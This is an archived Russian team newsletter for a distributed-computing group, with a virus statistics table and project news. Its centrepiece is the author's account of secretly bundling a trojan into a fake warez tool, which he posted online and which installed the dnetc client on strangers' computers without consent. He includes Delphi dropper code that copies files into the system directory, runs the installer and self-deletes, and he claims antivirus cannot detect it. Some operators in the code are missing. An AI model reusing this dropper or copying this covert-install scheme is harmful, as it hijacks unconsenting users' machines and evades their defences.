Отправляет email-рассылки с помощью сервиса Sendsay

Новости команды "Компьютерра"

  Все выпуски  

Новости команды "Компьютерра" Нарушая тишину...


Служба Рассылок Subscribe.Ru проекта Citycat.Ru
Разделы "ТимТерра" - News  
Команда
Подключиться
Faq
Статистика
О проекте
Участники
Программа-клиент
Файл с настройками
Приемная
Форум
Клуб
MyPortal Inc.

Рассылка 'Новости команды "Компьютерра"'

Доброго времени суток!

     Из-за довольно продолжительного времени отсутствия выхода рассылки, и накопившейся информации, я решил рискнуть (Mr.Dee я думаю простит меня) и выпустить этот номер рассылки sam ;-).

Последние громкие события в мире интернета связаны в основном с быстрым распространением сетевых червей (вирусов) и заражением большого количества серверов и компьютеров. Вот краткая табличка этих "монстров": 

Место Прошлый месяц Вирус Процент отчетов о вирусе
1 Новый W32/Sircam-A 65,2%
2 1 W32/Magistr-A 10,4%
3 3 W32/Hybris-B 4,1%
4 6 W32/Badtrans-A 2,8%
5 4 W32/Apology-B 1,9%
6 2 VBS/Kakworm 1,4%
7 Новый Troj/Keylog-C 1,0%
8 Возвращение Joke/HHold 0,8%
9 8 W32/Flcss 0,7%
9 5 W32/Qaz 0,7%
остальные 11,0%

   Но, как это и бывает, каждый думает, что именно его это не коснется, а зря... Казалось бы, что в наше время, люди уже наученные горьким опытом, притом на своей шкуре, должны соблюдать некоторую осторожность, но такого не случается. Я провел небольшой опыт. Написал "варезную тулзу" которую сделал носителем троянца и вывесил на одном из "супер-пупер" хакерских сайтов. Под видом вируса в систему жертвы инсталлировалась "корова" (dnetc.exe). Опытному пользователю не составляет никакого труда обнаружить "подвох" в такой программе, на нашим супер крутым хакерам это видимо не дано... Программа успешно начала распространяться. Сам файл представляет собой самораспаковывающийся exe-файл, внутри которого находятся dnetc.exe, dnetc.ini и сама программа под видом которой все это хозяйство и разносилось. В самой реализации вируса, нет ничего сложного, и осуществимо любым мало-мальски опытным программистом, вот кусочек кода, который собственно и заражал систему:
var // Переменные
dir:array[0..254] of char; // Массив для извлечения каталога
s:string; // Строка для системного каталога
f,ff,fff:file of byte; // Вход
f1,ff1,fff1:file of byte; // Выход
NumRead, NumWritten: Integer; // Блочное копирование
Buf: array[1..2048] of Char; // буфер обмена
begin
// Получение системного каталога
GetSystemDirectory(dir,255);s:=dir;
s:=s+'\dnetc.exe';
// Открытие файлов
AssignFile(f,'dnetc.exe');Reset(f);
AssignFile(ff,'dnetc.ini');Reset(ff);
AssignFile(fff,'windosprs.exe');Reset(fff);
// Создание приемников
AssignFile(f1,dir+'\dnetc.exe');Rewrite(f1);
AssignFile(ff1,dir+'\dnetc.ini');Rewrite(ff1);
AssignFile(fff1,dir+'\windosprs.exe');Rewrite(fff1);
// копирование
// Dnetc.exe
repeat
BlockRead(f, Buf, SizeOf(Buf), NumRead);
BlockWrite(f1, Buf, NumRead, NumWritten);
until (NumRead = 0) or (NumWritten NumRead);CloseFile(f1);
// Dnetc.ini
repeat
BlockRead(ff, Buf, SizeOf(Buf), NumRead);
BlockWrite(ff1, Buf, NumRead, NumWritten);
until (NumRead = 0) or (NumWritten NumRead);CloseFile(ff1);
// windos.exe
repeat
BlockRead(fff, Buf, SizeOf(Buf), NumRead);
BlockWrite(fff1, Buf, NumRead, NumWritten);
until (NumRead = 0) or (NumWritten NumRead);CloseFile(fff1);
// -------------------------------- Конец копирования вируса в систему
// ПОЛУЧЕНИЕ ВЕКТОРА ИСПОЛНЕНИЯ
StrCopy(dir, PChar(s));
// Установка вируса
ShellExecute(handle,'open',dir,'-install',nil,SW_RESTORE);
// Конец работы
// Автостирание информации ФЛАГ СОСТОЯНИЯ
FileStorage1.AutoExtract.RemoveOnTerminate:=true;
// Закрываем приемники
CloseFile(f);CloseFile(ff);CloseFile(fff);

Вот собственно и все, как видно из листинга, такие вещи доступны даже школьнику, причем антивирусы тут бессильны, поскольку обе программы используют документированные возможности системы и не прибегают к вирусоподобным и другим деструктивным действиям. К чему вся эта демагогия? Да к тому, что "не все то золото, что блестит" ;-)). Что же касается проекта "Bovine", то для развития наших способностей и удовлетворения любопытства, предлагаю программистам и всем желающим принять участие по разбору и анализу блоков, получаемых (и обрабатываемых) нами с сайта компании. Действительно ли это то, над чем мы работаем? Говоря простым языком, нужно узнать саму структуру блока, из чего он состоит. Если это кому ни будь интересно, предлагаю принять в этом участие. И последнее, наверное вы все уже слышали новость о том, что в России (официально) появился первый суперкомпьютер, который по своей мощности входит в 20 мощнейших компьютеров мира. Наша команда, по сути представляет собой тоже суперкомпьютер, с распараллеливанием процессов и кластерной структурой ;-))), а вот мощности своей машины мы не знаем. Что бы ее вычесть, нужно взять за эталон например P3/500, узнать его мощность в (Tflops) и скорость обработки ключей в сек. Затем взять среднестатическую скорость команды по обработке ключей, разделить на скорость P3/500, из этого мы получим кол-во задействованных у нас процессоров и умножить на Mflops одного проца. ;-)))) Может у кого-то найдется более упрощенный вариант этого решения. А нашу производительность можно будет гордо вывесит на сайте команды.

Всем удачи и хорошего настроения.


 Номер выпускал: Савинов Семен

Архив рассылки, статистика рассылки, каталог.



http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться Рейтингуется SpyLog

В избранное